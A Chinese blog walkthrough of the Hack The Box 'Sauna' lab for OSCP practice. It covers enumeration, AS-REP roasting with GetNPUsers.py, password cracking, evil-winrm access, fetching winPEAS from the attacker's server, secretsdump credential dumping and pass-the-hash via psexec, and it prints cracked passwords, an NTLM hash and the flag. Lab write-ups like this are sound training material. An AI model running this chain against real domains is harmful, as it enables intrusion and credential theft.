【OSCP-HTB.02】Sauna靶机渗透测试练习

admin 2024年10月29日12:59:33评论15 views字数 3009阅读10分1秒阅读模式

友情提醒

本文阅读时间推荐20min,靶场练习推荐3H

【OSCP-HTB.02】Sauna靶机渗透测试练习
如想讨论
以下内容
欢迎关注公众号联系我哟
*OSCP相关技术(备考冲刺中)*
CISSP备考经验(已通过认证)

CCSK(云安全)(已通过认证)

ISO/IEC 27001 Foundation(已通过认证)

OSCP模拟
HTB.Sauna
一、前言
***主要利用方式***通过GetNPUsers.py获取 Kerberos 协议中的非预认证用户的TGT获取hash后,使用john破解,得到一组用户及密码,突破边界上传winPEAS,获取第二组用户名密码,查看可登录用户通过类似的账号及密码,登录进入系统并使用secretsdump.py转存用户及hash,再使用psexec.py进行登录,获取root权限
二、靶机信息
靶场: hackthebox.com靶机名称: Sauna难度: window.Easy发布时间: Released on 15 Feb 2020下载地址:https://app.hackthebox.com/machines/Sauna备注:本靶场重点使用kali自带的impacket  这个目录文件
三、配置信息
攻击IP:10.10.16.3靶机IP:10.10.11.175
四、信息收集

1、探测靶机ip地址

└─$ sudo nmap -n -v -sC -sV -Pn 10.10.11.108 -oN return_nmap.txt

【OSCP-HTB.02】Sauna靶机渗透测试练习

2探测80端口

http://10.10.10.175/

【OSCP-HTB.02】Sauna靶机渗透测试练习

TCP 80端口目录扫描

└─$ dirsearch -u http://10.10.10.175/

【OSCP-HTB.02】Sauna靶机渗透测试练习

SMB - TCP 445

└─$ smbmap -H 10.10.10.175

【OSCP-HTB.02】Sauna靶机渗透测试练习

└─$ crackmapexec smb 10.10.10.175 --shares

【OSCP-HTB.02】Sauna靶机渗透测试练习

└─$ smbclient -N -L //10.10.10.175

【OSCP-HTB.02】Sauna靶机渗透测试练习

└─$ crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares

【OSCP-HTB.02】Sauna靶机渗透测试练习

得到一个域名:EGOTISTICAL-BANK.LOCAL

DNS - TCP/UDP 53

└─$ dig axfr @10.10.10.175 sauna.htb

【OSCP-HTB.02】Sauna靶机渗透测试练习

└─$ dig axfr @10.10.10.175 egotistical-bank.local

【OSCP-HTB.02】Sauna靶机渗透测试练习

五、边界突破

3、生成用户字典

about us页面暴露出了team member的名字,手动制作一个用户名字典

【OSCP-HTB.02】Sauna靶机渗透测试练习

4、使用GetNPUsers获取无认证用户信息

GetNPUsers.py impacket 工具集中的一个脚本,通常用于通过利用 Kerberos 协议中的某些特性来获取用户的相关信息,特别是针对那些不需要预认证(Pre-Authentication)的用户账户。

└─$ sudo python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /home/kali/htb/sauna/user -outputfile hashes.asreproast -dc-ip 10.10.10.175

【OSCP-HTB.02】Sauna靶机渗透测试练习

【OSCP-HTB.02】Sauna靶机渗透测试练习

5、查看hashes并使用john破解

【OSCP-HTB.02】Sauna靶机渗透测试练习

使用johnhashes进行暴力破解

【OSCP-HTB.02】Sauna靶机渗透测试练习

获得一组密码:【fsmith/Thestrokes23

6、使用evil-winrm登录,拿到user.txt

使用evil-winrm登录

└─$ evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

【OSCP-HTB.02】Sauna靶机渗透测试练习

 获取user.txt

*Evil-WinRM* PS C:UsersFSmithDocuments> cd ..*Evil-WinRM* PS C:UsersFSmith> cd Desktopt*Evil-WinRM* PS C:UsersFSmithDesktop>type user.txt

【OSCP-HTB.02】Sauna靶机渗透测试练习

六、提    权

7、上传winPEAS进行提权

kali启动python web 服务

【OSCP-HTB.02】Sauna靶机渗透测试练习

iwr上传winPEAS并执行

*Evil-WinRM* PS C:UsersFSmithDocuments> iwr -uri http://10.10.16.3/winPEASx64.exe-Outfile winPEAS.exe

【OSCP-HTB.02】Sauna靶机渗透测试练习

*Evil-WinRM* PS C:UsersFSmithDocuments> .winPEAS.exe

【OSCP-HTB.02】Sauna靶机渗透测试练习

发现一组账号密码:【svc_loanmanager/Moneymakestheworldgoround!

【OSCP-HTB.02】Sauna靶机渗透测试练习

8、使用FSmith探测可登录账号

【OSCP-HTB.02】Sauna靶机渗透测试练习

svc_loanmgr 查询用户信息

【OSCP-HTB.02】Sauna靶机渗透测试练习

发现svc_loanmgr同样有远程登录权限,尝试使用密码Moneymakestheworldgoround!登录

切换账号,使用winrm登录

└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

【OSCP-HTB.02】Sauna靶机渗透测试练习

9、转存用户密码Hash

使用fsmith用户进行

└─$ usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23@10.10.10.175

【OSCP-HTB.02】Sauna靶机渗透测试练习

使用svc_loanmgr用户进行操作

遇到特殊符号,用“或者用引号包含起来皆可

└─$ /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175└─$ /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175

【OSCP-HTB.02】Sauna靶机渗透测试练习

【OSCP-HTB.02】Sauna靶机渗透测试练习

获取一个administrator用户的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

10、使用Impacket中的psexec.py登录

└─$ /usr/share/doc/python3-impacket/examples/psexec.py Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

【OSCP-HTB.02】Sauna靶机渗透测试练习

11、进入administrator的桌面查看root.txt

C:Windowssystem32> cd C:UsersAdministrator

【OSCP-HTB.02】Sauna靶机渗透测试练习

C:UsersAdministrator> cd DesktopC:UsersAdministratorDesktop> type root.txtec1562582dee3fde2a433c452ea36ea1

【OSCP-HTB.02】Sauna靶机渗透测试练习

【OSCP-HTB.02】Sauna靶机渗透测试练习

END
走之前记得点个在看~【OSCP-HTB.02】Sauna靶机渗透测试练习

本期靶场到此结束咯,欢迎添加好友进VX交流群

【OSCP-HTB.02】Sauna靶机渗透测试练习

原文始发于微信公众号(从放弃到入门):【OSCP-HTB.02】Sauna靶机渗透测试练习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月29日12:59:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP-HTB.02】Sauna靶机渗透测试练习https://cn-sec.com/archives/3328420.html

发表评论

匿名网友 填写信息